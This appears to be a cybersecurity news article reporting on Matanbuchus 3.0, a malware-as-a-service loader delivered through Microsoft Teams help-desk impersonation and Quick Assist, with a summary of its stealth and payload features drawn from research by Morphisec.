Cybersecurity researchers have flagged an advanced variant of a known malware loader dubbed Matanbuchus, which enhances its stealth features to avoid detection. This latest version, known as Matanbuchus 3.0, operates as a malware-as-a-service (MaaS) and serves as a conduit for subsequent payloads such as Cobalt Strike beacons and ransomware.
Initially advertised in February 2021 for a rental price of $2,500 on Russian-speaking cybercrime forums, Matanbuchus has since evolved to include sophisticated social engineering techniques to trick users into executing malicious software. Unlike many typical malware variants that spread via spam emails and drive-by downloads, Matanbuchus often requires a hands-on approach, directly targeting victims with impersonation tactics. In some incidents, these loaders facilitate initial access for brokers who sell access to ransomware groups, making them more coordinated than commodity loaders.
According to cybersecurity firm Morphisec, the latest incarnation of the malware has been linked to incidents involving external Microsoft Teams calls where attackers impersonated IT help desk representatives. This manipulation led employees to initiate Quick Assist for remote access, from which a PowerShell script was executed to deploy the Matanbuchus loader. Similar tactics have been previously employed by threat actors associated with the Black Basta ransomware operation.
Matanbuchus 3.0 distinguishes itself with improved communication protocols, in-memory capabilities, and enhanced obfuscation methods. The malware also utilizes CMD and PowerShell reverse shell support and can execute next-stage DLL, EXE, and shellcode payloads. The lure of Matanbuchus has been notably marketed for up to $15,000 for its advanced versions.
This sophisticated threat collects system information, scanning active processes for security tools and determining administrative privileges before contacting a command-and-control (C2) server for additional payloads. Researchers note that the developers have incorporated intricate scheduling techniques, demonstrating a significant evolution in the Matanbuchus framework that heightens its risks within compromised systems. The trend of stealth-first loaders like Matanbuchus underlines the growing abuse of enterprise platforms like Microsoft Teams and Zoom.